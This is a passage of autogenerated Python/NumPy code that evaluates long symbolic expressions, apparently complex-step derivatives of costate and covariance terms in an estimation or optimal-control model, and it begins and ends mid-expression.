lamP12_N*p12_n**2*p12_s*xb*yb/(Dt*sigr**2*(x_s**2*(1.0e-100*1j + x_n)**2 - 2*x_s*xb*(1.0e-100*1j + x_n) + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) - lamP12_N*p12_n*p22_n*p22_s*y_n**2*y_s**2/(Dt*sigr**2*(x_s**2*(1.0e-100*1j + x_n)**2 - 2*x_s*xb*(1.0e-100*1j + x_n) + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) + 2*lamP12_N*p12_n*p22_n*p22_s*y_n*y_s*yb/(Dt*sigr**2*(x_s**2*(1.0e-100*1j + x_n)**2 - 2*x_s*xb*(1.0e-100*1j + x_n) + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) - lamP12_N*p12_n*p22_n*p22_s*yb**2/(Dt*sigr**2*(x_s**2*(1.0e-100*1j + x_n)**2 - 2*x_s*xb*(1.0e-100*1j + x_n) + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) - lamP13_N*p11_n*p11_s*p13_n*x_s**2*(1.0e-100*1j + x_n)**2/(Dt*sigr**2*(x_s**2*(1.0e-100*1j + x_n)**2 - 2*x_s*xb*(1.0e-100*1j + x_n) + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) + 2*lamP13_N*p11_n*p11_s*p13_n*x_s*xb*(1.0e-100*1j + x_n)/(Dt*sigr**2*(x_s**2*(1.0e-100*1j + x_n)**2 - 2*x_s*xb*(1.0e-100*1j + x_n) + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) - lamP13_N*p11_n*p11_s*p13_n*xb**2/(Dt*sigr**2*(x_s**2*(1.0e-100*1j + x_n)**2 - 2*x_s*xb*(1.0e-100*1j + x_n) + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) - lamP13_N*p11_n*p11_s*p23_n*p23_s*x_s*y_n*y_s*(1.0e-100*1j + x_n)/(Dt*p13_s*sigr**2*(x_s**2*(1.0e-100*1j + x_n)**2 - 2*x_s*xb*(1.0e-100*1j + x_n) + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) + lamP13_N*p11_n*p11_s*p23_n*p23_s*x_s*yb*(1.0e-100*1j + x_n)/(Dt*p13_s*sigr**2*(x_s**2*(1.0e-100*1j + x_n)**2 - 2*x_s*xb*(1.0e-100*1j + x_n) + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) + lamP13_N*p11_n*p11_s*p23_n*p23_s*xb*y_n*y_s/(Dt*p13_s*sigr**2*(x_s**2*(1.0e-100*1j + x_n)**2 - 2*x_s*xb*(1.0e-100*1j + x_n) + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) - lamP13_N*p11_n*p11_s*p23_n*p23_s*xb*yb/(Dt*p13_s*sigr**2*(x_s**2*(1.0e-100*1j + x_n)**2 - 2*x_s*xb*(1.0e-100*1j + x_n) + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) - lamP13_N*p12_n*p12_s*p13_n*x_s*y_n*y_s*(1.0e-100*1j + x_n)/(Dt*sigr**2*(x_s**2*(1.0e-100*1j + x_n)**2 - 2*x_s*xb*(1.0e-100*1j + x_n) + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) + lamP13_N*p12_n*p12_s*p13_n*x_s*yb*(1.0e-100*1j + x_n)/(Dt*sigr**2*(x_s**2*(1.0e-100*1j + x_n)**2 - 2*x_s*xb*(1.0e-100*1j + x_n) + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) + lamP13_N*p12_n*p12_s*p13_n*xb*y_n*y_s/(Dt*sigr**2*(x_s**2*(1.0e-100*1j + x_n)**2 - 2*x_s*xb*(1.0e-100*1j + x_n) + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) - lamP13_N*p12_n*p12_s*p13_n*xb*yb/(Dt*sigr**2*(x_s**2*(1.0e-100*1j + x_n)**2 - 2*x_s*xb*(1.0e-100*1j + x_n) + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) - lamP13_N*p12_n*p12_s*p23_n*p23_s*y_n**2*y_s**2/(Dt*p13_s*sigr**2*(x_s**2*(1.0e-100*1j + x_n)**2 - 2*x_s*xb*(1.0e-100*1j + x_n) + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) + 2*lamP13_N*p12_n*p12_s*p23_n*p23_s*y_n*y_s*yb/(Dt*p13_s*sigr**2*(x_s**2*(1.0e-100*1j + x_n)**2 - 2*x_s*xb*(1.0e-100*1j + x_n) + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) - lamP13_N*p12_n*p12_s*p23_n*p23_s*yb**2/(Dt*p13_s*sigr**2*(x_s**2*(1.0e-100*1j + x_n)**2 - 2*x_s*xb*(1.0e-100*1j + x_n) + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) - lamP22_N*p12_n**2*p12_s**2*x_s**2*(1.0e-100*1j + x_n)**2/(Dt*p22_s*sigr**2*(x_s**2*(1.0e-100*1j + x_n)**2 - 2*x_s*xb*(1.0e-100*1j + x_n) + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) + 2*lamP22_N*p12_n**2*p12_s**2*x_s*xb*(1.0e-100*1j + x_n)/(Dt*p22_s*sigr**2*(x_s**2*(1.0e-100*1j + x_n)**2 - 2*x_s*xb*(1.0e-100*1j + x_n) + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) - lamP22_N*p12_n**2*p12_s**2*xb**2/(Dt*p22_s*sigr**2*(x_s**2*(1.0e-100*1j + x_n)**2 - 2*x_s*xb*(1.0e-100*1j + x_n) + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) - 2*lamP22_N*p12_n*p12_s*p22_n*x_s*y_n*y_s*(1.0e-100*1j + x_n)/(Dt*sigr**2*(x_s**2*(1.0e-100*1j + x_n)**2 - 2*x_s*xb*(1.0e-100*1j + x_n) + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) + 2*lamP22_N*p12_n*p12_s*p22_n*x_s*yb*(1.0e-100*1j + x_n)/(Dt*sigr**2*(x_s**2*(1.0e-100*1j + x_n)**2 - 2*x_s*xb*(1.0e-100*1j + x_n) + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) + 2*lamP22_N*p12_n*p12_s*p22_n*xb*y_n*y_s/(Dt*sigr**2*(x_s**2*(1.0e-100*1j + x_n)**2 - 2*x_s*xb*(1.0e-100*1j + x_n) + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) - 2*lamP22_N*p12_n*p12_s*p22_n*xb*yb/(Dt*sigr**2*(x_s**2*(1.0e-100*1j + x_n)**2 - 2*x_s*xb*(1.0e-100*1j + x_n) + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) - lamP22_N*p22_n**2*p22_s*y_n**2*y_s**2/(Dt*sigr**2*(x_s**2*(1.0e-100*1j + x_n)**2 - 2*x_s*xb*(1.0e-100*1j + x_n) + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) + 2*lamP22_N*p22_n**2*p22_s*y_n*y_s*yb/(Dt*sigr**2*(x_s**2*(1.0e-100*1j + x_n)**2 - 2*x_s*xb*(1.0e-100*1j + x_n) + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) - lamP22_N*p22_n**2*p22_s*yb**2/(Dt*sigr**2*(x_s**2*(1.0e-100*1j + x_n)**2 - 2*x_s*xb*(1.0e-100*1j + x_n) + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) - lamP23_N*p12_n*p12_s*p13_n*p13_s*x_s**2*(1.0e-100*1j + x_n)**2/(Dt*p23_s*sigr**2*(x_s**2*(1.0e-100*1j + x_n)**2 - 2*x_s*xb*(1.0e-100*1j + x_n) + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) + 2*lamP23_N*p12_n*p12_s*p13_n*p13_s*x_s*xb*(1.0e-100*1j + x_n)/(Dt*p23_s*sigr**2*(x_s**2*(1.0e-100*1j + x_n)**2 - 2*x_s*xb*(1.0e-100*1j + x_n) + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) - lamP23_N*p12_n*p12_s*p13_n*p13_s*xb**2/(Dt*p23_s*sigr**2*(x_s**2*(1.0e-100*1j + x_n)**2 - 2*x_s*xb*(1.0e-100*1j + x_n) + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) - lamP23_N*p12_n*p12_s*p23_n*x_s*y_n*y_s*(1.0e-100*1j + x_n)/(Dt*sigr**2*(x_s**2*(1.0e-100*1j + x_n)**2 - 2*x_s*xb*(1.0e-100*1j + x_n) + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) + lamP23_N*p12_n*p12_s*p23_n*x_s*yb*(1.0e-100*1j + x_n)/(Dt*sigr**2*(x_s**2*(1.0e-100*1j + x_n)**2 - 2*x_s*xb*(1.0e-100*1j + x_n) + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) + lamP23_N*p12_n*p12_s*p23_n*xb*y_n*y_s/(Dt*sigr**2*(x_s**2*(1.0e-100*1j + x_n)**2 - 2*x_s*xb*(1.0e-100*1j + x_n) + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) - lamP23_N*p12_n*p12_s*p23_n*xb*yb/(Dt*sigr**2*(x_s**2*(1.0e-100*1j + x_n)**2 - 2*x_s*xb*(1.0e-100*1j + x_n) + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) - lamP23_N*p13_n*p13_s*p22_n*p22_s*x_s*y_n*y_s*(1.0e-100*1j + x_n)/(Dt*p23_s*sigr**2*(x_s**2*(1.0e-100*1j + x_n)**2 - 2*x_s*xb*(1.0e-100*1j + x_n) + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) + lamP23_N*p13_n*p13_s*p22_n*p22_s*x_s*yb*(1.0e-100*1j + x_n)/(Dt*p23_s*sigr**2*(x_s**2*(1.0e-100*1j + x_n)**2 - 2*x_s*xb*(1.0e-100*1j + x_n) + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) + lamP23_N*p13_n*p13_s*p22_n*p22_s*xb*y_n*y_s/(Dt*p23_s*sigr**2*(x_s**2*(1.0e-100*1j + x_n)**2 - 2*x_s*xb*(1.0e-100*1j + x_n) + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) - lamP23_N*p13_n*p13_s*p22_n*p22_s*xb*yb/(Dt*p23_s*sigr**2*(x_s**2*(1.0e-100*1j + x_n)**2 - 2*x_s*xb*(1.0e-100*1j + x_n) + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) - lamP23_N*p22_n*p22_s*p23_n*y_n**2*y_s**2/(Dt*sigr**2*(x_s**2*(1.0e-100*1j + x_n)**2 - 2*x_s*xb*(1.0e-100*1j + x_n) + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) + 2*lamP23_N*p22_n*p22_s*p23_n*y_n*y_s*yb/(Dt*sigr**2*(x_s**2*(1.0e-100*1j + x_n)**2 - 2*x_s*xb*(1.0e-100*1j + x_n) + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) - lamP23_N*p22_n*p22_s*p23_n*yb**2/(Dt*sigr**2*(x_s**2*(1.0e-100*1j + x_n)**2 - 2*x_s*xb*(1.0e-100*1j + x_n) + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) - lamP33_N*p13_n**2*p13_s**2*x_s**2*(1.0e-100*1j + x_n)**2/(Dt*p33_s*sigr**2*(x_s**2*(1.0e-100*1j + x_n)**2 - 2*x_s*xb*(1.0e-100*1j + x_n) + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) + 2*lamP33_N*p13_n**2*p13_s**2*x_s*xb*(1.0e-100*1j + x_n)/(Dt*p33_s*sigr**2*(x_s**2*(1.0e-100*1j + x_n)**2 - 2*x_s*xb*(1.0e-100*1j + x_n) + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) - lamP33_N*p13_n**2*p13_s**2*x_s*y_n*y_s*(1.0e-100*1j + x_n)/(Dt*p33_s*sigr**2*(x_s**2*(1.0e-100*1j + x_n)**2 - 2*x_s*xb*(1.0e-100*1j + x_n) + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) + lamP33_N*p13_n**2*p13_s**2*x_s*yb*(1.0e-100*1j + x_n)/(Dt*p33_s*sigr**2*(x_s**2*(1.0e-100*1j + x_n)**2 - 2*x_s*xb*(1.0e-100*1j + x_n) + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) - lamP33_N*p13_n**2*p13_s**2*xb**2/(Dt*p33_s*sigr**2*(x_s**2*(1.0e-100*1j + x_n)**2 - 2*x_s*xb*(1.0e-100*1j + x_n) + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) + lamP33_N*p13_n**2*p13_s**2*xb*y_n*y_s/(Dt*p33_s*sigr**2*(x_s**2*(1.0e-100*1j + x_n)**2 - 2*x_s*xb*(1.0e-100*1j + x_n) + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) - lamP33_N*p13_n**2*p13_s**2*xb*yb/(Dt*p33_s*sigr**2*(x_s**2*(1.0e-100*1j + x_n)**2 - 2*x_s*xb*(1.0e-100*1j + x_n) + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) - lamP33_N*p13_n*p13_s*p23_n*p23_s*x_s*y_n*y_s*(1.0e-100*1j + x_n)/(Dt*p33_s*sigr**2*(x_s**2*(1.0e-100*1j + x_n)**2 - 2*x_s*xb*(1.0e-100*1j + x_n) + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) + lamP33_N*p13_n*p13_s*p23_n*p23_s*x_s*yb*(1.0e-100*1j + x_n)/(Dt*p33_s*sigr**2*(x_s**2*(1.0e-100*1j + x_n)**2 - 2*x_s*xb*(1.0e-100*1j + x_n) + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) + lamP33_N*p13_n*p13_s*p23_n*p23_s*xb*y_n*y_s/(Dt*p33_s*sigr**2*(x_s**2*(1.0e-100*1j + x_n)**2 - 2*x_s*xb*(1.0e-100*1j + x_n) + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) - lamP33_N*p13_n*p13_s*p23_n*p23_s*xb*yb/(Dt*p33_s*sigr**2*(x_s**2*(1.0e-100*1j + x_n)**2 - 2*x_s*xb*(1.0e-100*1j + x_n) + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) - lamP33_N*p13_n*p13_s*p23_n*p23_s*y_n**2*y_s**2/(Dt*p33_s*sigr**2*(x_s**2*(1.0e-100*1j + x_n)**2 - 2*x_s*xb*(1.0e-100*1j + x_n) + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) + 2*lamP33_N*p13_n*p13_s*p23_n*p23_s*y_n*y_s*yb/(Dt*p33_s*sigr**2*(x_s**2*(1.0e-100*1j + x_n)**2 - 2*x_s*xb*(1.0e-100*1j + x_n) + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)) - lamP33_N*p13_n*p13_s*p23_n*p23_s*yb**2/(Dt*p33_s*sigr**2*(x_s**2*(1.0e-100*1j + x_n)**2 - 2*x_s*xb*(1.0e-100*1j + x_n) + xb**2 + y_n**2*y_s**2 - 2*y_n*y_s*yb + yb**2)))/1e-100),
(tf)*(-np.imag(-lamP11_N*p11_n**2*p11_s*x_n**2*x_s**2/(Dt*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_s**2*(1.0e-100*1j + y_n)**2 - 2*y_s*yb*(1.0e-100*1j + y_n) + yb**2)) + 2*lamP11_N*p11_n**2*p11_s*x_n*x_s*xb/(Dt*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_s**2*(1.0e-100*1j + y_n)**2 - 2*y_s*yb*(1.0e-100*1j + y_n) + yb**2)) - lamP11_N*p11_n**2*p11_s*xb**2/(Dt*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_s**2*(1.0e-100*1j + y_n)**2 - 2*y_s*yb*(1.0e-100*1j + y_n) + yb**2)) - 2*lamP11_N*p11_n*p12_n*p12_s*x_n*x_s*y_s*(1.0e-100*1j + y_n)/(Dt*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_s**2*(1.0e-100*1j + y_n)**2 - 2*y_s*yb*(1.0e-100*1j + y_n) + yb**2)) + 2*lamP11_N*p11_n*p12_n*p12_s*x_n*x_s*yb/(Dt*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_s**2*(1.0e-100*1j + y_n)**2 - 2*y_s*yb*(1.0e-100*1j + y_n) + yb**2)) + 2*lamP11_N*p11_n*p12_n*p12_s*xb*y_s*(1.0e-100*1j + y_n)/(Dt*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_s**2*(1.0e-100*1j + y_n)**2 - 2*y_s*yb*(1.0e-100*1j + y_n) + yb**2)) - 2*lamP11_N*p11_n*p12_n*p12_s*xb*yb/(Dt*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_s**2*(1.0e-100*1j + y_n)**2 - 2*y_s*yb*(1.0e-100*1j + y_n) + yb**2)) - lamP11_N*p12_n**2*p12_s**2*y_s**2*(1.0e-100*1j + y_n)**2/(Dt*p11_s*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_s**2*(1.0e-100*1j + y_n)**2 - 2*y_s*yb*(1.0e-100*1j + y_n) + yb**2)) + 2*lamP11_N*p12_n**2*p12_s**2*y_s*yb*(1.0e-100*1j + y_n)/(Dt*p11_s*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_s**2*(1.0e-100*1j + y_n)**2 - 2*y_s*yb*(1.0e-100*1j + y_n) + yb**2)) - lamP11_N*p12_n**2*p12_s**2*yb**2/(Dt*p11_s*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_s**2*(1.0e-100*1j + y_n)**2 - 2*y_s*yb*(1.0e-100*1j + y_n) + yb**2)) - lamP12_N*p11_n*p11_s*p12_n*x_n**2*x_s**2/(Dt*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_s**2*(1.0e-100*1j + y_n)**2 - 2*y_s*yb*(1.0e-100*1j + y_n) + yb**2)) + 2*lamP12_N*p11_n*p11_s*p12_n*x_n*x_s*xb/(Dt*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_s**2*(1.0e-100*1j + y_n)**2 - 2*y_s*yb*(1.0e-100*1j + y_n) + yb**2)) - lamP12_N*p11_n*p11_s*p12_n*xb**2/(Dt*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_s**2*(1.0e-100*1j + y_n)**2 - 2*y_s*yb*(1.0e-100*1j + y_n) + yb**2)) - lamP12_N*p11_n*p11_s*p22_n*p22_s*x_n*x_s*y_s*(1.0e-100*1j + y_n)/(Dt*p12_s*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_s**2*(1.0e-100*1j + y_n)**2 - 2*y_s*yb*(1.0e-100*1j + y_n) + yb**2)) + lamP12_N*p11_n*p11_s*p22_n*p22_s*x_n*x_s*yb/(Dt*p12_s*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_s**2*(1.0e-100*1j + y_n)**2 - 2*y_s*yb*(1.0e-100*1j + y_n) + yb**2)) + lamP12_N*p11_n*p11_s*p22_n*p22_s*xb*y_s*(1.0e-100*1j + y_n)/(Dt*p12_s*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_s**2*(1.0e-100*1j + y_n)**2 - 2*y_s*yb*(1.0e-100*1j + y_n) + yb**2)) - lamP12_N*p11_n*p11_s*p22_n*p22_s*xb*yb/(Dt*p12_s*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_s**2*(1.0e-100*1j + y_n)**2 - 2*y_s*yb*(1.0e-100*1j + y_n) + yb**2)) - lamP12_N*p12_n**2*p12_s*x_n*x_s*y_s*(1.0e-100*1j + y_n)/(Dt*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_s**2*(1.0e-100*1j + y_n)**2 - 2*y_s*yb*(1.0e-100*1j + y_n) + yb**2)) + lamP12_N*p12_n**2*p12_s*x_n*x_s*yb/(Dt*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_s**2*(1.0e-100*1j + y_n)**2 - 2*y_s*yb*(1.0e-100*1j + y_n) + yb**2)) + lamP12_N*p12_n**2*p12_s*xb*y_s*(1.0e-100*1j + y_n)/(Dt*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_s**2*(1.0e-100*1j + y_n)**2 - 2*y_s*yb*(1.0e-100*1j + y_n) + yb**2)) - lamP12_N*p12_n**2*p12_s*xb*yb/(Dt*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_s**2*(1.0e-100*1j + y_n)**2 - 2*y_s*yb*(1.0e-100*1j + y_n) + yb**2)) - lamP12_N*p12_n*p22_n*p22_s*y_s**2*(1.0e-100*1j + y_n)**2/(Dt*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_s**2*(1.0e-100*1j + y_n)**2 - 2*y_s*yb*(1.0e-100*1j + y_n) + yb**2)) + 2*lamP12_N*p12_n*p22_n*p22_s*y_s*yb*(1.0e-100*1j + y_n)/(Dt*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_s**2*(1.0e-100*1j + y_n)**2 - 2*y_s*yb*(1.0e-100*1j + y_n) + yb**2)) - lamP12_N*p12_n*p22_n*p22_s*yb**2/(Dt*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_s**2*(1.0e-100*1j + y_n)**2 - 2*y_s*yb*(1.0e-100*1j + y_n) + yb**2)) - lamP13_N*p11_n*p11_s*p13_n*x_n**2*x_s**2/(Dt*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_s**2*(1.0e-100*1j + y_n)**2 - 2*y_s*yb*(1.0e-100*1j + y_n) + yb**2)) + 2*lamP13_N*p11_n*p11_s*p13_n*x_n*x_s*xb/(Dt*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_s**2*(1.0e-100*1j + y_n)**2 - 2*y_s*yb*(1.0e-100*1j + y_n) + yb**2)) - lamP13_N*p11_n*p11_s*p13_n*xb**2/(Dt*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_s**2*(1.0e-100*1j + y_n)**2 - 2*y_s*yb*(1.0e-100*1j + y_n) + yb**2)) - lamP13_N*p11_n*p11_s*p23_n*p23_s*x_n*x_s*y_s*(1.0e-100*1j + y_n)/(Dt*p13_s*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_s**2*(1.0e-100*1j + y_n)**2 - 2*y_s*yb*(1.0e-100*1j + y_n) + yb**2)) + lamP13_N*p11_n*p11_s*p23_n*p23_s*x_n*x_s*yb/(Dt*p13_s*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_s**2*(1.0e-100*1j + y_n)**2 - 2*y_s*yb*(1.0e-100*1j + y_n) + yb**2)) + lamP13_N*p11_n*p11_s*p23_n*p23_s*xb*y_s*(1.0e-100*1j + y_n)/(Dt*p13_s*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_s**2*(1.0e-100*1j + y_n)**2 - 2*y_s*yb*(1.0e-100*1j + y_n) + yb**2)) - lamP13_N*p11_n*p11_s*p23_n*p23_s*xb*yb/(Dt*p13_s*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_s**2*(1.0e-100*1j + y_n)**2 - 2*y_s*yb*(1.0e-100*1j + y_n) + yb**2)) - lamP13_N*p12_n*p12_s*p13_n*x_n*x_s*y_s*(1.0e-100*1j + y_n)/(Dt*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_s**2*(1.0e-100*1j + y_n)**2 - 2*y_s*yb*(1.0e-100*1j + y_n) + yb**2)) + lamP13_N*p12_n*p12_s*p13_n*x_n*x_s*yb/(Dt*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_s**2*(1.0e-100*1j + y_n)**2 - 2*y_s*yb*(1.0e-100*1j + y_n) + yb**2)) + lamP13_N*p12_n*p12_s*p13_n*xb*y_s*(1.0e-100*1j + y_n)/(Dt*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_s**2*(1.0e-100*1j + y_n)**2 - 2*y_s*yb*(1.0e-100*1j + y_n) + yb**2)) - lamP13_N*p12_n*p12_s*p13_n*xb*yb/(Dt*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_s**2*(1.0e-100*1j + y_n)**2 - 2*y_s*yb*(1.0e-100*1j + y_n) + yb**2)) - lamP13_N*p12_n*p12_s*p23_n*p23_s*y_s**2*(1.0e-100*1j + y_n)**2/(Dt*p13_s*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_s**2*(1.0e-100*1j + y_n)**2 - 2*y_s*yb*(1.0e-100*1j + y_n) + yb**2)) + 2*lamP13_N*p12_n*p12_s*p23_n*p23_s*y_s*yb*(1.0e-100*1j + y_n)/(Dt*p13_s*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_s**2*(1.0e-100*1j + y_n)**2 - 2*y_s*yb*(1.0e-100*1j + y_n) + yb**2)) - lamP13_N*p12_n*p12_s*p23_n*p23_s*yb**2/(Dt*p13_s*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_s**2*(1.0e-100*1j + y_n)**2 - 2*y_s*yb*(1.0e-100*1j + y_n) + yb**2)) - lamP22_N*p12_n**2*p12_s**2*x_n**2*x_s**2/(Dt*p22_s*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_s**2*(1.0e-100*1j + y_n)**2 - 2*y_s*yb*(1.0e-100*1j + y_n) + yb**2)) + 2*lamP22_N*p12_n**2*p12_s**2*x_n*x_s*xb/(Dt*p22_s*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_s**2*(1.0e-100*1j + y_n)**2 - 2*y_s*yb*(1.0e-100*1j + y_n) + yb**2)) - lamP22_N*p12_n**2*p12_s**2*xb**2/(Dt*p22_s*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_s**2*(1.0e-100*1j + y_n)**2 - 2*y_s*yb*(1.0e-100*1j + y_n) + yb**2)) - 2*lamP22_N*p12_n*p12_s*p22_n*x_n*x_s*y_s*(1.0e-100*1j + y_n)/(Dt*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_s**2*(1.0e-100*1j + y_n)**2 - 2*y_s*yb*(1.0e-100*1j + y_n) + yb**2)) + 2*lamP22_N*p12_n*p12_s*p22_n*x_n*x_s*yb/(Dt*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_s**2*(1.0e-100*1j + y_n)**2 - 2*y_s*yb*(1.0e-100*1j + y_n) + yb**2)) + 2*lamP22_N*p12_n*p12_s*p22_n*xb*y_s*(1.0e-100*1j + y_n)/(Dt*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_s**2*(1.0e-100*1j + y_n)**2 - 2*y_s*yb*(1.0e-100*1j + y_n) + yb**2)) - 2*lamP22_N*p12_n*p12_s*p22_n*xb*yb/(Dt*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_s**2*(1.0e-100*1j + y_n)**2 - 2*y_s*yb*(1.0e-100*1j + y_n) + yb**2)) - lamP22_N*p22_n**2*p22_s*y_s**2*(1.0e-100*1j + y_n)**2/(Dt*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_s**2*(1.0e-100*1j + y_n)**2 - 2*y_s*yb*(1.0e-100*1j + y_n) + yb**2)) + 2*lamP22_N*p22_n**2*p22_s*y_s*yb*(1.0e-100*1j + y_n)/(Dt*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_s**2*(1.0e-100*1j + y_n)**2 - 2*y_s*yb*(1.0e-100*1j + y_n) + yb**2)) - lamP22_N*p22_n**2*p22_s*yb**2/(Dt*sigr**2*(x_n**2*x_s**2 - 2*x_n*x_s*xb + xb**2 + y_s**2*(1.0e-100*1j + y_n)**2 - 2*y_s*yb*(1.0e-100*1j + y_n) + 